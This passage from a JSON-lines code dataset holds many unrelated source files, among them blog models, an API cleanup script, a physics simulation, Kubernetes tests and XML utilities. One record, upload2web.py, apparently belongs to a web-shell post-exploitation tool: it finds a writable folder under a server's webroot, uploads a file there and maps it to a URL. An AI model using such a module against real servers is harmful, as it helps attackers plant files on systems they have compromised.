update(cls, id, form):\n        t = cls.find(id)\n        log('要尝试更新的博客', t)\n        log('update 传进来的 form 和 id', form, id)\n        if t is None:\n            log('尝试对一个不存在的博客更新')\n            return None\n        for key in form:\n            setattr(t, key, form[key])\n        t.ut = int(time.time())\n        t.save()\n        Blog.update_adjacency()\n        return t\n\n    @classmethod\n    def all(cls, **kwargs):\n        blogs = super().all(**kwargs)\n        blogs.reverse()\n        # bs = [b.json() for b in blogs]\n        # bs = [b.remove('deleted') for b in bs]\n        return blogs\n\n    def increase_visits(self):\n        self.views += 1  # 'views' is the declared field; there is no 'visits' attribute\n        self.save()\n\n    def update_replies(self):\n        self.replies = len(self.comments())\n        self.save()\n\n    def comments(self):\n        all_comments = Comment.find_all(blog_id=self._id)\n        return all_comments\n\n    def json(self):\n        # log('json blog object start')\n        d = self.__dict__.copy()\n        log('json end, self', d)\n        return d\n\n    def delete(self):\n        # Comment.delete_all(blog_id=self._id)\n        self.deleted = True\n        self.update_adjacency()\n        self.save()\n\n    @classmethod\n    def _update_first(cls):\n        blogs = Blog.all()\n        first = blogs[0]\n        log('要更新的最新的一个 blog 是', first)\n        first.next_id = ''\n        first.next_title = ''\n        first.save()\n\n    @classmethod\n    def _update_last(cls):\n        blogs = Blog.all()\n        last = blogs[-1]\n        log('要更新的最旧的一个 blog 是', last)\n        last.previous_id = ''\n        last.previous_title = ''\n        log('这个blog 的 previous', last.previous_id, last.previous_title)\n        last.save()\n\n    @classmethod\n    def update_adjacency(cls):\n        log('更新邻近 blog')\n        blogs = Blog.all()\n        log('所有的 blog', blogs)\n\n        if len(blogs) == 0:\n            return\n\n        for i, blog in enumerate(blogs):\n            if i > 0:\n                next_blog = blogs[i - 1]\n                blog.next_id = 
next_blog.id\n blog.next_title = next_blog.title\n if i < len(blogs) - 1:\n prev_blog = blogs[i + 1]\n blog.previous_id = prev_blog.id\n blog.previous_title = prev_blog.title\n blog.save()\n\n Blog._update_first()\n Blog._update_last()\n \n @classmethod\n def find_all(cls, **kwargs):\n blogs = super().find_all(**kwargs)\n return blogs\n\n @classmethod\n def find_by(cls, **kwargs):\n blog = super().find_by(**kwargs)\n log('find by id : blog', blog)\n # if blog is None or blog.deleted is True:\n # return None\n return blog\n\n @classmethod\n def assembled(cls, form):\n content = form.pop('content')\n content_list = re.split(r'[\\r\\n]', content, 1)\n\n title = content_list[0]\n body = content_list[1].lstrip()\n log('生成的 body ', body)\n log('拆分body', re.split(r'[\\r\\n]', body, 1))\n excerpt = re.split(r'[\\r\\n]', body, 1)[0].strip()\n log('生成的简介', excerpt)\n form['body'] = body\n form['excerpt'] = excerpt\n form['title'] = title\n\n cover_name = form.get('cover_name', None)\n if cover_name is not None:\n cover_name = os.path.join(config.server_path, cover_name)\n form['cover_name'] = cover_name\n\n return form\n\n\n# 评论类\nclass Comment(Mongodb):\n def __init__(self, form, user_id=-1):\n self._id = form.get('id', None)\n self.author = form.get('author', '待定')\n self.content = form.get('content', '')\n # 和别的数据关联的方式, 用 user_id 表明拥有它的 user 实例\n self.user_id = form.get('user_id', user_id)\n self.blog_id = int(form.get('blog_id', -1))\n self.reply_id = int(form.get('reply_id', -1))\n self.root_id = int(form.get('root_id', -1))\n self.ct = int(time.time())\n self.ut = self.ct\n self.deleted = False\n self.agreed = 0\n\n @staticmethod\n def default_content():\n return '该评论已删除'\n\n def delete(self):\n self.deleted = True\n self.save()\n\n @classmethod\n def delete_all(cls, **kwargs):\n blogs = cls.all()\n for k, v in kwargs.items():\n for b in blogs:\n if b.__dict__[k] == v and b.deleted is False:\n b.delete()\n\n @classmethod\n def find_all(cls, **kwargs):\n comments = super().find_all(**kwargs)\n cs = []\n for c in comments:\n if c.deleted is True:\n c.content = cls.default_content()\n cs.append(c)\n # cs = [c for c in comments if c.deleted is False]\n return cs\n\n @classmethod\n def find_by(cls, **kwargs):\n comment = super().find_by(**kwargs)\n if comment is None or comment.deleted is True:\n return None\n return comment\n\n def agree(self):\n self.agreed += 1\n self.save()\n","sub_path":"models/blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":6710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"606763976","text":"from .. 
import base\n\n\nclass SeleniumCommand(base.Command):\n\n    def __init__(self, ifc, *args, **kwargs):\n        self.ifc = ifc\n        if self.ifc is None:\n            raise TypeError('Selenium interface cannot be None.')\n        assert self.ifc.is_opened()\n        self.api = self.ifc.api\n\n        super(SeleniumCommand, self).__init__(*args, **kwargs)\n\n    def __repr__(self):\n        parent = super(SeleniumCommand, self).__repr__()\n        opt = {}\n        opt['session_id'] = self.api.session_id\n        opt['url'] = self.api.command_executor._url\n        return parent + \"(url=%(url)s session_id=%(session_id)s)\" % opt\n","sub_path":"f5test/commands/ui/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"180922531","text":"# coding:utf-8\n\nimport os\nimport sys\n\nf_date = sys.argv[1]\n\nif __name__ == \"__main__\":\n    i = 1\n    while i < 14:\n        file_name = 'url_{0}_'.format(f_date) + str(i) + 'kw'\n        start_num = (i - 1) * 10000000 + 1\n        end_num = 10000000 * i\n        cmd1 = \"sed -n '{0},{1}p' url_{2} >>{3}\".format(start_num, end_num, f_date, file_name)\n        os.system(cmd1)\n        i += 1\n","sub_path":"course_test/31_split_file.py","file_name":"31_split_file.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"476623541","text":"import sys\r\nimport requests\r\nimport json\r\nfrom pandas.io.json import json_normalize\r\n\r\n\r\n# This script is used to find and clean a map full of tasks using the wrike api\r\n# first, a user is asked for the map name after which the program initializes the process.\r\n\r\nprint(\"please enter the exact name of the map\")\r\nfilename = input()\r\nprint(\"The chosen file name is: \" + filename)\r\n# Find filename in wrike db and pull correct projectID\r\nurl = \"https://app-eu.wrike.com/api/v3/folders?project=false&deleted=false\"\r\nheaders = {}  # request headers; the auth token is added below\r\nwith open(\"authorization.txt\",\"r\") as f:\r\n    headers['authorization'] = f.read()\r\nprint(headers)\r\n\r\nresponse = requests.get(url, headers=headers)\r\nyields = str(response.text)\r\nyields = yields.replace('☎', 'tel')\r\n\r\nwith open('wriketemp.json', 'w+') as outf:\r\n    outf.write(yields)\r\nwith open('wriketemp.json') as f:\r\n    result = json.load(f)\r\nmapdictionary= {}\r\nfor i in range(len(result[\"data\"])):\r\n    mapdictionary[result[\"data\"][i][\"title\"]] = result[\"data\"][i][\"id\"]\r\ntry:\r\n    mapID = mapdictionary[filename]\r\nexcept(KeyError):\r\n    print(\"Map name invalid, try again:\")\r\n    filename = input()\r\n# Callback to issue command again\r\n# Now that we know the mapId we can pull all tasks from said map:\r\nurl = \"https://app-eu.wrike.com/api/v3/folders/\"+mapID+\"/tasks?descendants=true&pageSize=1000&fields=['customFields','authorIds']\"\r\nresponse = requests.get(url, headers=headers)\r\nwith open(filename+\".json\", 'w+') as outf:\r\n    outf.write(response.text)\r\nwith open(filename+\".json\") as f:\r\n    data = json.load(f)\r\nusernamedict = {}\r\ncustomfieldsdict = {}\r\nfor y in range(len(data[\"data\"])):\r\n    for i in data[\"data\"][y][\"customFields\"]:\r\n        cf = i['id']\r\n        if cf in customfieldsdict.keys():\r\n            i['id'] = customfieldsdict[cf]\r\n        else:\r\n            print(\"customFieldID not present, calling API\")\r\n            url = \"https://app-eu.wrike.com/api/v3/customfields/\" + cf\r\n            response = requests.get(url, headers=headers)\r\n            with open('wriketemp.json', 'w+') as outf:\r\n                outf.write(response.text)\r\n            try:\r\n                with open('wriketemp.json') as f:\r\n                    result = json.load(f)\r\n            
except:\r\n print(\"unexpected error\")\r\n cfname = result[\"data\"][0][\"title\"]\r\n customfieldsdict[cf] = cfname\r\n i['id'] = cfname\r\n\r\nfor i in data[\"data\"]:\r\n users = i[\"authorIds\"][0]\r\n if users in usernamedict.keys():\r\n i[\"authorIds\"][0] = usernamedict[users]\r\n else:\r\n print(\"UserID not present, calling API\")\r\n url = \"https://app-eu.wrike.com/api/v3/users/\" + users\r\n response = requests.get(url, headers=headers)\r\n with open('wriketemp.json', 'w+') as outf:\r\n outf.write(response.text)\r\n try:\r\n with open('wriketemp.json') as f:\r\n result = json.load(f)\r\n except:\r\n print(\"unexpected error\")\r\n name = result[\"data\"][0][\"firstName\"] + \" \" + result[\"data\"][0][\"lastName\"]\r\n usernamedict[users] = name\r\n i[\"authorIds\"][0] = name\r\n\r\nwith open(filename+\".json\", 'w+') as outfile:\r\n json.dump(data, outfile)\r\n\r\n\r\n\r\n\r\n","sub_path":"CleandataWrike.py","file_name":"CleandataWrike.py","file_ext":"py","file_size_in_byte":3187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"18576364","text":"from core.vectors import PhpCode, ShellCmd, ModuleExec, Os\nfrom core.module import Module\nfrom core import modules\nfrom core import messages\nfrom core.loggers import log\nimport urlparse\nimport os\n\nclass Upload2web(Module):\n\n \"\"\"Upload file automatically to a web folder and get corresponding URL\"\"\"\n\n aliases = [ 'rm' ]\n\n def init(self):\n\n self.register_info(\n {\n 'author': [\n 'Emilio Pinna'\n ],\n 'license': 'GPLv3'\n }\n )\n\n self.register_arguments([\n { 'name' : 'lpath', 'help' : 'Local file path' },\n { 'name' : 'rpath', 'help' : 'Path. If is a folder find the first writable folder in it.', 'default' : '.', 'nargs' : '?' 
},\n ])\n\n def _get_env_info(self, script_url):\n\n script_folder_data = ModuleExec('system_info', [ '-info', 'script_folder' ]).run()\n if not script_folder_data or not script_folder_data.get('script_folder'): return\n\n script_folder = script_folder_data.get('script_folder')\n script_url_splitted = urlparse.urlsplit(script_url)\n script_url_path_folder, script_url_path_filename = os.path.split(\n script_url_splitted.path)\n\n url_folder_pieces = script_url_path_folder.split(os.sep)\n folder_pieces = script_folder.split(os.sep)\n\n for pieceurl, piecefolder in zip(reversed(url_folder_pieces), reversed(folder_pieces)):\n if pieceurl == piecefolder:\n folder_pieces.pop()\n url_folder_pieces.pop()\n else:\n break\n\n base_url_path_folder = os.sep.join(url_folder_pieces)\n self.base_folder_url = urlparse.urlunsplit(\n script_url_splitted[:2] + (base_url_path_folder, ) + script_url_splitted[3:])\n self.base_folder_path = os.sep.join(folder_pieces)\n\n def _map_folder2web(self, relative_path_folder='.'):\n\n absolute_path = ModuleExec('file_check', [ relative_path_folder, 'abspath' ]).run()\n\n if not absolute_path:\n log.warn(messages.module_file_upload2web.failed_resolve_path)\n return None, None\n\n if not absolute_path.startswith(self.base_folder_path.rstrip('/')):\n log.warn(messages.module_file_upload2web.error_s_not_under_webroot_s % (\n absolute_path,\n self.base_folder_path.rstrip('/'))\n )\n return None, None\n\n relative_to_webroot_path = absolute_path.replace(\n self.base_folder_path,\n ''\n )\n\n url_folder = '%s/%s' % (self.base_folder_url.rstrip('/'),\n relative_to_webroot_path.lstrip('/'))\n\n return absolute_path, url_folder\n\n def _map_file2web(self, relative_path_file):\n\n relative_path_folder, filename = os.path.split(relative_path_file)\n if not relative_path_folder:\n relative_path_folder = './'\n\n absolute_path_folder, url_folder = self._map_folder2web(\n relative_path_folder)\n\n if not absolute_path_folder or not url_folder:\n return None, None\n\n absolute_path_file = os.path.join(absolute_path_folder, filename)\n url_file = os.path.join(url_folder, filename)\n\n return absolute_path_file, url_file\n\n def run(self, args):\n\n self._get_env_info(self.session['url'])\n if not self.base_folder_url or not self.base_folder_path:\n log.warn(messages.module_file_upload2web.failed_retrieve_info)\n\n # If remote path is a folder, get first writable folder\n if ModuleExec(\"file_check\", [ args['rpath'], 'dir' ]).run():\n folders = ModuleExec(\"file_find\", [ '-writable', '-quit', args['rpath'] ]).run()\n\n if not folders or not folders[0]:\n log.warn(messages.module_file_upload2web.failed_search_writable_starting_s % args['rpath'])\n return\n\n # Get file name from lpath\n lfolder, lname = os.path.split(args['lpath'])\n\n # TODO: all the paths should be joined with remote OS_SEP from system_info.\n args['rpath'] = os.path.join(folders[0], lname)\n\n if ModuleExec(\"file_upload\", [ args['lpath'], args['rpath'] ]).run():\n # Guess URL from rpath\n return [ self._map_file2web(args['rpath']) ]\n","sub_path":"modules/file/upload2web.py","file_name":"upload2web.py","file_ext":"py","file_size_in_byte":4445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"484208085","text":"import numpy as np\r\nimport random\r\nimport massParam as P\r\n\r\nclass massDynamics:\r\n def __init__(self, alpha=0.0):\r\n # Initial state conditions\r\n self.state = np.array([\r\n [P.z0], # initial position\r\n [P.zdot0] # initial velocity\r\n 
])\r\n\r\n # simulation time step\r\n self.Ts = P.Ts\r\n\r\n # mass of box\r\n self.m = P.m * (1.+alpha*(2.*np.random.rand()-1.))\r\n\r\n # spring coefficient\r\n self.k = P.k * (1.+alpha*(2.*np.random.rand()-1.))\r\n\r\n # Damping coefficient, Ns\r\n self.b = P.b * (1.+alpha*(2.*np.random.rand()-1.))\r\n self.force_limit = P.f_max\r\n\r\n def update(self, u):\r\n # This is the external method that takes the input u at time\r\n # t and returns the output y at time t.\r\n # saturate the input torque\r\n u = self.saturate(u, self.force_limit)\r\n\r\n self.rk4_step(u) # propagate the state by one time sample\r\n y = self.h() # return the corresponding output\r\n\r\n return y\r\n\r\n def f(self, state, u):\r\n # Return xdot = f(x,u)\r\n z = state.item(0)\r\n zdot = state.item(1)\r\n force = u\r\n\r\n M = self.m\r\n\r\n C = -self.k * z + force - self.b * zdot\r\n\r\n\r\n #tmp = np.linalg.inv(M) @ C\r\n zddot = C/M\r\n\r\n # build xdot and return\r\n xdot = np.array([[zdot], [zddot]])\r\n return xdot\r\n\r\n def h(self):\r\n # return y = h(x)\r\n z = self.state.item(0)\r\n y = np.array([[z]])\r\n\r\n return y\r\n\r\n def rk4_step(self, u):\r\n # Integrate ODE using Runge-Kutta RK4 algorithm\r\n F1 = self.f(self.state, u)\r\n F2 = self.f(self.state + self.Ts / 2 * F1, u)\r\n F3 = self.f(self.state + self.Ts / 2 * F2, u)\r\n F4 = self.f(self.state + self.Ts * F3, u)\r\n self.state = self.state + self.Ts / 6 * (F1 + (2 * F2) + (2 * F3) + F4)\r\n\r\n def saturate(self, u, limit):\r\n if abs(u) > limit:\r\n u = limit*np.sign(u)\r\n return u\r\n","sub_path":"homework_template_folders/d_mass/python/hw3/massDynamics.py","file_name":"massDynamics.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"486524256","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom django.contrib import admin\r\n\r\nfrom ..models import *\r\n\r\n\r\n#\r\n# Admin: Redirect\r\n#\r\n\r\nclass RedirectAdmin(admin.ModelAdmin):\r\n fieldsets = [\r\n ['Podstawowe informacje', {\r\n 'fields': ['name', 'target_url']\r\n }],\r\n ]\r\n ordering = ['name']\r\n list_display = ['name', 'slug', 'target_url']\r\n \r\n class Media:\r\n js = ['panel/js/admin/utils.js', 'panel/js/admin/base.js']\r\n \r\nadmin.site.register(Redirect, RedirectAdmin)\r\n","sub_path":"src/apro/allegro_pots/admin/redirects.py","file_name":"redirects.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"130016410","text":"from django.contrib import admin\n\n# Register your models here.\nfrom .models import Booking\n\nclass BookingAdmin(admin.ModelAdmin):\n list_display=('id','customerID','packageName','price', 'startDate','endDate')\n list_display_links=('id',)\n search_fields=('id',)\n list_per_page=25\n\nadmin.site.register(Booking,BookingAdmin)","sub_path":"bookings/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"545665747","text":"import unittest\nimport os\nimport pkg_resources\nimport pandas as pd\nimport numpy as np\n\n\n\nDATA_PATH = pkg_resources.resource_filename('cheml', os.path.join('tests', 'data'))\n\nfrom cheml.preprocessing import MissingValues\n\n\n# dummy data\ndf = pd.read_csv(os.path.join(DATA_PATH,'test_missing_values.csv'), header=None)\ntarget=pd.DataFrame([1,2,3,np.nan,4])\n\n\nclass TestConstantColumns(unittest.TestCase):\n def 
test_zero(self):\n mv = MissingValues(strategy = 'zero',\n string_as_null = True,\n inf_as_null = True,\n missing_values = None)\n f = mv.fit_transform(df)\n t = mv.fit_transform(target)\n self.assertEqual((5,9), f.shape)\n self.assertEqual(0.0, f[10][0])\n self.assertEqual(0.0, f[10][2])\n self.assertEqual(0.0, f[2][1])\n self.assertEqual(0.0, f[1][0])\n\nif __name__== '__main__':\n unittest.main()\n\n","sub_path":"cheml/tests/test_MissingValues.py","file_name":"test_MissingValues.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"173330867","text":"# =================================================================\n#\n# Terms and Conditions of Use\n#\n# Unless otherwise noted, computer program source code of this\n# distribution is covered under Crown Copyright, Government of\n# Canada, and is distributed under the MIT License.\n#\n# The Canada wordmark and related graphics associated with this\n# distribution are protected under trademark law and copyright law.\n# No permission is granted to use them outside the parameters of\n# the Government of Canada's corporate identity program. For\n# more information, see\n# http://www.tbs-sct.gc.ca/fip-pcim/index-eng.asp\n#\n# Copyright title to all 3rd party software distributed with this\n# software is held by the respective copyright holders as noted in\n# those files. Users are asked to read the 3rd Party Licenses\n# referenced with those assets.\n#\n# Copyright (c) 2020 Government of Canada\n# Copyright (c) 2020 IBL Software Engineering spol. s r. o.\n#\n# Permission is hereby granted, free of charge, to any person\n# obtaining a copy of this software and associated documentation\n# files (the \"Software\"), to deal in the Software without\n# restriction, including without limitation the rights to use,\n# copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following\n# conditions:\n#\n# The above copyright notice and this permission notice shall be\n# included in all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\n# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES\n# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND\n# NONINFRINGEMENT. 
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT\n# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,\n# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR\n# OTHER DEALINGS IN THE SOFTWARE.\n#\n# =================================================================\n\nimport logging\nimport os\nimport ssl\nimport sys\nfrom urllib.error import URLError\nfrom urllib.request import urlopen\n\nfrom lxml import etree\n\nLOGGER = logging.getLogger(__name__)\n\nNAMESPACES = {\n 'gco': 'http://www.isotc211.org/2005/gco',\n 'gmd': 'http://www.isotc211.org/2005/gmd',\n 'gml': 'http://www.opengis.net/gml/3.2',\n 'gmx': 'http://www.isotc211.org/2005/gmx',\n 'xlink': 'http://www.w3.org/1999/xlink'\n}\n\n\ndef get_cli_common_options(function):\n \"\"\"\n Define common CLI options\n \"\"\"\n\n import click\n function = click.option('--verbosity', '-v',\n type=click.Choice(\n ['ERROR', 'WARNING', 'INFO', 'DEBUG']),\n help='Verbosity')(function)\n function = click.option('--log', '-l', 'logfile',\n type=click.Path(writable=True, dir_okay=False),\n help='Log file')(function)\n return function\n\n\ndef get_codelists():\n \"\"\"\n Helper function to assemble dict of WMO codelists\n\n :returns: `dict` of WMO codelists\n\n \"\"\"\n codelists = {}\n userdir = get_userdir()\n xml = etree.parse('{}{}WMOCodeLists.xml'.format(userdir, os.sep))\n for cld in xml.xpath('gmx:codelistItem/gmx:CodeListDictionary', namespaces=NAMESPACES):\n identifier = cld.get(nspath_eval('gml:id'))\n codelists[identifier] = []\n for centry in cld.findall(nspath_eval('gmx:codeEntry/gmx:CodeDefinition/gml:identifier')):\n codelists[identifier].append(centry.text)\n return codelists\n\n\ndef get_userdir() -> str:\n \"\"\"\n Helper function to get userdir\n\n :returns: user's home directory\n \"\"\"\n\n return '{}{}{}'.format(os.path.expanduser('~'), os.sep, '.pywcmp')\n\n\ndef nspath_eval(xpath: str) -> str:\n \"\"\"\n Return an etree friendly xpath based expanding namespace\n into namespace URIs\n\n :param xpath: xpath string with namespace prefixes\n\n :returns: etree friendly xpath\n \"\"\"\n\n out = []\n for chunks in xpath.split('/'):\n namespace, element = chunks.split(':')\n out.append('{{{}}}{}'.format(NAMESPACES[namespace], element))\n return '/'.join(out)\n\n\ndef setup_logger(loglevel: str = None, logfile: str = None):\n \"\"\"\n Setup logging\n\n :param loglevel: logging level\n :param logfile: logfile location\n\n :returns: void (creates logging instance)\n \"\"\"\n\n if loglevel is None and logfile is None: # no logging\n return\n\n if loglevel is None and logfile is not None:\n loglevel = 'INFO'\n\n log_format = \\\n '[%(asctime)s] %(levelname)s - %(message)s'\n date_format = '%Y-%m-%dT%H:%M:%SZ'\n\n loglevels = {\n 'CRITICAL': logging.CRITICAL,\n 'ERROR': logging.ERROR,\n 'WARNING': logging.WARNING,\n 'INFO': logging.INFO,\n 'DEBUG': logging.DEBUG,\n 'NOTSET': logging.NOTSET,\n }\n\n loglevel = loglevels[loglevel]\n\n if logfile is not None: # log to file\n logging.basicConfig(level=loglevel, datefmt=date_format,\n format=log_format, filename=logfile)\n elif loglevel is not None: # log to stdout\n logging.basicConfig(level=loglevel, datefmt=date_format,\n format=log_format, stream=sys.stdout)\n LOGGER.debug('Logging initialized')\n\n\ndef urlopen_(url: str):\n \"\"\"\n Helper function for downloading a URL\n\n :param url: URL to download\n\n :returns: `http.client.HTTPResponse`\n \"\"\"\n\n try:\n response = urlopen(url)\n except (ssl.SSLError, 
URLError) as err:\n LOGGER.warning(err)\n LOGGER.warning('Creating unverified context')\n context = ssl._create_unverified_context()\n\n response = urlopen(url, context=context)\n\n return response\n\n\ndef check_url(url: str, check_ssl: bool) -> dict:\n \"\"\"\n Helper function to check link (URL) accessibility\n\n :param url: The URL to check\n :param check_ssl: Whether the SSL/TLS layer verification shall be made\n\n :returns: `dict` with details about the link\n \"\"\"\n\n result = {}\n response = None\n result['url-original'] = url\n try:\n if check_ssl is False:\n LOGGER.debug('Creating unverified context')\n result['ssl'] = False\n context = ssl._create_unverified_context()\n response = urlopen(url, context=context)\n else:\n response = urlopen(url)\n except (ssl.SSLError, URLError) as err:\n LOGGER.debug(err)\n\n if response is None and check_ssl is True:\n return check_url(url, False)\n\n if response is not None:\n result['url-resolved'] = response.url\n if response.status > 300:\n LOGGER.debug('Request failed: {}'.format(response))\n result['accessible'] = response.status < 300\n if response.url.startswith(\"https\") and check_ssl is True:\n result['ssl'] = True\n else:\n result['accessible'] = False\n return result\n\n\ndef validate_iso_xml(xml):\n \"\"\"\n Perform XML Schema validation of ISO XML Metadata\n\n :param xml: file or string of XML\n\n :returns: `bool` of whether XML validates ISO schema\n \"\"\"\n\n userdir = get_userdir()\n if not os.path.exists(userdir):\n raise IOError('{} does not exist'.format(userdir))\n if isinstance(xml, str):\n xml = etree.fromstring(xml)\n xsd = os.path.join(userdir, 'iso-all.xsd')\n LOGGER.debug('Validating {} against schema {}'.format(xml, xsd))\n schema = etree.XMLSchema(etree.parse(xsd))\n schema.assertValid(xml)\n","sub_path":"pywcmp/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":7604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"91158530","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n## タイトル\n03. 
円周率\n\"Now I need a drink, alcoholic of course, after the heavy lectures involving quantum mechanics.\"\nという文を単語に分解し,各単語の(アルファベットの)文字数を先頭から出現順に並べたリストを作成せよ.\n\n## メモ\n\n\n\"\"\"\n\ninput_str = u'Now I need a drink, alcoholic of course, after the heavy lectures involving quantum mechanics.'\nprint(input_str)\n\noutput_list = input_str.split(\" \")\n\n#print(output_list)\n#print(type(output_list))\n\nfor h in range(len(output_list)):\n print(output_list[h])\n\n","sub_path":"c3.py","file_name":"c3.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"571665417","text":"#\n# Copyright (c) 2021 Incisive Technology Ltd\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\nimport pytest\nfrom typing import cast\nfrom unittest import SkipTest\nfrom hikaru import *\nfrom hikaru.model.rel_1_17 import *\nfrom kubernetes import config\n\n\ntests_namespace = 'other-args-tests-17'\n\n\ndef beginning():\n config.load_kube_config(config_file=\"/etc/rancher/k3s/k3s.yaml\")\n ns = Namespace(metadata=ObjectMeta(name=tests_namespace))\n res = ns.createNamespace()\n return res\n\n\ndef ending():\n Namespace.deleteNamespace(name=tests_namespace)\n res: Response = PodList.listPodForAllNamespaces()\n plist: PodList = cast(PodList, res.obj)\n for pod in plist.items:\n if pod.metadata.namespace == tests_namespace:\n try:\n Pod.deleteNamespacedPod(pod.metadata.name, pod.metadata.namespace)\n except:\n pass\n\n\n@pytest.fixture(scope='module', autouse=True)\ndef setup():\n res = beginning()\n yield res.obj\n ending()\n\n\ndef test01():\n \"\"\"\n Check async pod creation\n \"\"\"\n base_pod = Pod(metadata=ObjectMeta(name='pod-test01'),\n spec=PodSpec(\n containers=[Container(image='busybox',\n name='sleep',\n args=[\"/bin/sh\",\n \"-c\"])]\n ))\n res = base_pod.createNamespacedPod(namespace=tests_namespace, async_req=True)\n assert not res.obj\n val = res.get(20)\n assert type(val) is tuple\n assert res.obj\n dres = Pod.deleteNamespacedPod(base_pod.metadata.name,\n tests_namespace, async_req=True)\n assert not dres.obj\n val = dres.get(20)\n assert type(val) is tuple\n assert dres.obj\n\n\ndef test02():\n \"\"\"\n Check doing a dry run on Pod creation\n \"\"\"\n p = Pod(metadata=ObjectMeta(name='pod-test02'),\n spec=PodSpec(\n containers=[Container(image='busybox',\n name='sleep',\n args=[\"/bin/sh\",\n \"-c\"])]\n ))\n res = p.createNamespacedPod(namespace=tests_namespace,\n dry_run='All')\n assert res.obj\n assert 
isinstance(res.obj, Pod)\n assert res.obj.metadata.name == p.metadata.name\n try:\n rres = Pod.readNamespacedPod(p.metadata.name,\n tests_namespace)\n except:\n pass # we were supposed to get an exception\n else:\n assert False, 'we were able to read a pod that was created with dry_run'\n\n\ndef test03():\n \"\"\"\n Test doing both async and dry run\n \"\"\"\n p = Pod(metadata=ObjectMeta(name='pod-test03'),\n spec=PodSpec(\n containers=[Container(image='busybox',\n name='sleep',\n args=[\"/bin/sh\",\n \"-c\"])]\n ))\n res = p.createNamespacedPod(namespace=tests_namespace,\n async_req=True,\n dry_run='All')\n assert not res.obj\n val = res.get()\n assert type(val) is tuple\n assert res.obj\n assert isinstance(res.obj, Pod)\n try:\n rres = Pod.readNamespacedPod(p.metadata.name,\n tests_namespace)\n except:\n pass\n else:\n assert False, 'we were able to read a dryrun pod'\n\n\ndef test04():\n \"\"\"\n test the other async methods on the returned Response\n \"\"\"\n base_pod = Pod(metadata=ObjectMeta(name='pod-test04'),\n spec=PodSpec(\n containers=[Container(image='busybox',\n name='sleep',\n args=[\"/bin/sh\",\n \"-c\"])]\n ))\n res = base_pod.createNamespacedPod(namespace=tests_namespace, async_req=True)\n assert not res.obj\n res.wait(20)\n try:\n assert res.ready()\n val = res.get()\n assert type(val) is tuple\n assert res.obj\n assert res.successful()\n finally:\n dres = Pod.deleteNamespacedPod(base_pod.metadata.name,\n tests_namespace, async_req=True)\n assert not dres.obj\n val = dres.get(20)\n assert type(val) is tuple\n assert dres.obj\n\n\nif __name__ == \"__main__\":\n beginning()\n the_tests = {k: v for k, v in globals().items()\n if k.startswith('test') and callable(v)}\n for k, v in the_tests.items():\n try:\n v()\n except SkipTest:\n pass\n except Exception as e:\n print(f'{k} failed with {str(e)}, {e.__class__}')\n ending()\n raise\n ending()\n","sub_path":"tests/e2e/other_args_rel_1_17.py","file_name":"other_args_rel_1_17.py","file_ext":"py","file_size_in_byte":5937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"173450280","text":"import bottle\nimport json\nimport math\n\n\nourSnakeHead = [0,0]\nourSnake = []\nsnakeName = \"cscusnake\"\n\ndef getDistance(itemA, itemB=ourSnakeHead):\n\n dx = itemA[0] - itemB[0]\n dy = itemA[1] - itemB[1]\n\n dx = math.fabs(dx)\n dy = math.fabs(dy)\n\n return dx + 